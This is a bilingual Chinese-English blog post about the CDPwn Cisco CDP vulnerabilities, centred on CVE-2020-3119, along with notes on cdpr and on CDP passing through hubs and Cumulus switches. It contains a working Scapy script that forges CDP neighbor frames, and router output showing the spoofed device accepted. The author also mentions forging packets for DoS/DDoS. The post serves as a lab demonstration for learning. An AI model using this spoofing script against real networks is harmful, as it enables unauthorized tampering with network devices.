Armis是一家網路安全公司,他在2020五月時向思科報告已發現的5個CDP漏洞,這5個漏洞分別為CVE-2020-3110、CVE-2020-3111、CVE-2020-3118、CVE-2020-3119、CVE-2020-3120,合稱CDPwn系列漏洞。
雖然各大網站對CDPwn描述得很驚恐,這個漏洞波及數以千萬計的思科設備,因為思科的作業系統預設啟用CDP,其實最關鍵的影響僅在思科IP電話、視訊產品上,因為這些設備依賴CDP運作,如果這個區域網路上沒有思科語音視訊流量的需求,關閉CDP即可。
這篇文章將針對CDPwn CVE-2020-3119討論。封包可以偽造嗎?當然可以,筆者也常將偽造封包應用在DoS / DDoS,不過此地不討論。這裡我要偽造CDP訊框,我使用ubuntu20,並安裝套件如下...
sudo apt-get update
sudo apt-get install python3 python3-scapy
新建一個python檔案,內容如下
linux@ubuntu20:~$ cat cdpwn.py
from scapy.contrib import cdp
from scapy.all import Dot3, LLC, SNAP, sendp
ethernet = Dot3(dst="01:00:0c:cc:cc:cc")
llc = LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03)/SNAP()
cdp_header = cdp.CDPv2_HDR(vers=2, ttl=180)
deviceid = cdp.CDPMsgDeviceID(val='CChaha')
portid = cdp.CDPMsgPortID(iface="CCIE61614")
address = cdp.CDPMsgAddr(naddr=1, addr=cdp.CDPAddrRecordIPv4(addr="1.2.3.4"))
cap = cdp.CDPMsgCapabilities(cap=1)
power_req = cdp.CDPMsgUnknown19(val="aaaa"+"bbbb")
power_level = cdp.CDPMsgPower(power=16)
cdp_packet = cdp_header/deviceid/portid/address/cap/power_req/power_level
sendp(ethernet/llc/cdp_packet, iface="enp0s3")
linux@ubuntu20:~$
linux@ubuntu20:~$ sudo python3 cdpwn.py #需用root執行
.
Sent 1 packets.
linux@ubuntu20:~$
再從正常思科設備上查看CDP鄰居資訊
Router#show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge
S - Switch, H - Host, I - IGMP, r - Repeater, P - Phone,
D - Remote, C - CVTA, M - Two-port Mac Relay
Device ID Local Intrfce Holdtme Capability Platform Port ID
CChaha Gig 1/0 54 R CCIE61614
Router#
Router#show cdp neighbors detail
-------------------------
Device ID: CChaha
Entry address(es):
IP address: 1.2.3.4
Platform: , Capabilities: Router
Interface: GigabitEthernet1/0, Port ID (outgoing port): CCIE61614
Holdtime : 52 sec
advertisement version: 2
Power drawn: 0.016 Watts
Router#
封包捕捉
補充內容1:從linux上秀CDP資訊,需要安裝套件 sudo apt-get install cdpr,執行命令為sudo cdpr並選擇網卡,或直接指定網卡sudo cdpr -d [用ifconfig查網卡名稱],執行內容如下...
linux@ubuntu20:~$ sudo cdpr -d enp0s3
cdpr - Cisco Discovery Protocol Reporter
Version 2.4
Copyright (c) 2002-2010 - MonkeyMental.com
Using Device: enp0s3
Waiting for CDP advertisement:
(default config is to transmit CDP packets every 60 seconds)
Device ID
value: Router
Addresses
value: 192.168.160.158
Port ID
value: GigabitEthernet1/0
linux@ubuntu20:~$
不過缺點是這個程式似乎僅能秀1個設備。
補充內容2:CDP透明,菜鳥工程師需要多留意。
實務上可能會遇到一種情形如圖,SW1的f0/1同時連接兩個設備,造成這種輸出可能有2種因素。
因素1:
若中間節點為集線器,可能會有這種結果。
因素2:將非思科交換器取代上圖的集線器,也可能導致這種輸出;原理是只有思科設備才能辨識CDP訊框,非思科設備看不懂CDP內容而當作一般封包傳送出去。
不過有例外!非思科的Mellanox Cumulus交換器竟然看得懂CDP,請見下方...
Router#show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge
S - Switch, H - Host, I - IGMP, r - Repeater, P - Phone,
D - Remote, C - CVTA, M - Two-port Mac Relay
Device ID Local Intrfce Holdtme Capability Platform Port ID
cumulus Gig 1/0 91 R Linux swp1
Router#
我的cumulus版本為4.3,配置為
net del interface swp1 link down #這句類似思科的interface swp1,然後no shutdown
net commit
經查官方文件後,原來cumulus的LLDP相容CDP,來源:https://docs.cumulusnetworks.com/cumulus-linux-41/Layer-2/Link-Layer-Discovery-Protocol/
補充內容3:這是我見過攻擊CDP漏洞最精彩的案例:https://www.youtube.com/watch?v=1zFFXpSNov0&ab_channel=MicrosoftIsraelR%26DCenter
Armis is a cybersecurity company. It has report to Cisco for 5 CDP vulnerabilities on May 2020. The 5 vulnerabilities are CVE-2020-3110, CVE-2020-3111, CVE-2020-3118, CVE-2020-3119, CVE-2020-3120. They are called CDPwn series vulnerability.
Although, those websites described CDPwn has very scared. The vulnerabilities effect very much of Cisco devices. Because Cisco OS is enable CDP by default. Actually, the most critical effect is on Cisco IP phone, video product only. Because these devices are depend CDP to working. If there has not Cisco voice / video that traffic at LAN, disable CDP is okay no problem.
The article will discuss CDPwn CVE-2020-3119. Can packet be forged? Of course, I have often forge packet and used for DoS / DDoS. But we don't discuss it, at here I will forge CDP frame, I used ubuntu20 and install package follow...
sudo apt-get update
sudo apt-get install python3 python3-scapy
Create a python file,
linux@ubuntu20:~$ cat cdpwn.py
from scapy.contrib import cdp
from scapy.all import Dot3, LLC, SNAP, sendp
ethernet = Dot3(dst="01:00:0c:cc:cc:cc")
llc = LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03)/SNAP()
cdp_header = cdp.CDPv2_HDR(vers=2, ttl=180)
deviceid = cdp.CDPMsgDeviceID(val='CChaha')
portid = cdp.CDPMsgPortID(iface="CCIE61614")
address = cdp.CDPMsgAddr(naddr=1, addr=cdp.CDPAddrRecordIPv4(addr="1.2.3.4"))
cap = cdp.CDPMsgCapabilities(cap=1)
power_req = cdp.CDPMsgUnknown19(val="aaaa"+"bbbb")
power_level = cdp.CDPMsgPower(power=16)
cdp_packet = cdp_header/deviceid/portid/address/cap/power_req/power_level
sendp(ethernet/llc/cdp_packet, iface="enp0s3")
linux@ubuntu20:~$
linux@ubuntu20:~$ sudo python3 cdpwn.py #You need execute by root
.
Sent 1 packets.
linux@ubuntu20:~$
And then, to get CDP info from normal Cisco device.
Router#show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge
S - Switch, H - Host, I - IGMP, r - Repeater, P - Phone,
D - Remote, C - CVTA, M - Two-port Mac Relay
Device ID Local Intrfce Holdtme Capability Platform Port ID
CChaha Gig 1/0 54 R CCIE61614
Router#
Router#show cdp neighbors detail
-------------------------
Device ID: CChaha
Entry address(es):
IP address: 1.2.3.4
Platform: , Capabilities: Router
Interface: GigabitEthernet1/0, Port ID (outgoing port): CCIE61614
Holdtime : 52 sec
advertisement version: 2
Power drawn: 0.016 Watts
Router#
Packet capture
[image: CDP frame]
Extra content 1: If you want to get CDP info from linux, you need install package that is 「 sudo apt-get install cdpr」. To execute command is 「sudo cdpr」 and select interface.
Or to specified interface like「sudo cdpr -d [use ifconfig to find interface name]」, the execution content follow...
linux@ubuntu20:~$ sudo cdpr -d enp0s3
cdpr - Cisco Discovery Protocol Reporter
Version 2.4
Copyright (c) 2002-2010 - MonkeyMental.com
Using Device: enp0s3
Waiting for CDP advertisement:
(default config is to transmit CDP packets every 60 seconds)
Device ID
value: Router
Addresses
value: 192.168.160.158
Port ID
value: GigabitEthernet1/0
linux@ubuntu20:~$
But its disadvantage, it can view 1 device only.
Extra content 2: CDP transparent, students need more attention.
[image: SW1#show cdp neighbors]
Actually, SW1's f0/1 to connect 2 devices, cause this situation that maybe by 2 factors.
Factor 1:
[image: topology]
If middle node is hub, it possible.
Factor 2:Non-Cisco switch to replace hub of topology. It possible. The principle is only Cisco OS can verify CDP frame, non-Cisco device can not verify CDP content, and as a normal packet to transmit.
However with exception! Mellanox Cumulus switch can to verify CDP, follow please...
Router#show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge
S - Switch, H - Host, I - IGMP, r - Repeater, P - Phone,
D - Remote, C - CVTA, M - Two-port Mac Relay
Device ID Local Intrfce Holdtme Capability Platform Port ID
cumulus Gig 1/0 91 R Linux swp1
Router#
My cumulus version is 4.3, the configuration is
net del interface swp1 link down #This command as if Cisco's interface swp1, and no shutdown.
net commit
I have check official document, the reason is cumulus's LLDP can compatible with CDP. The source:https://docs.cumulusnetworks.com/cumulus-linux-41/Layer-2/Link-Layer-Discovery-Protocol/
Extra content 3: It is the most exciting for CDP vulnerability, the source:https://www.youtube.com/watch?v=1zFFXpSNov0&ab_channel=MicrosoftIsraelR%26DCenter
[image: BlueHat IL 2020 - Ben Seri & Yuval Sarel - CDPwn: Taking Over Millions of Enterprise-Things...]
留言列表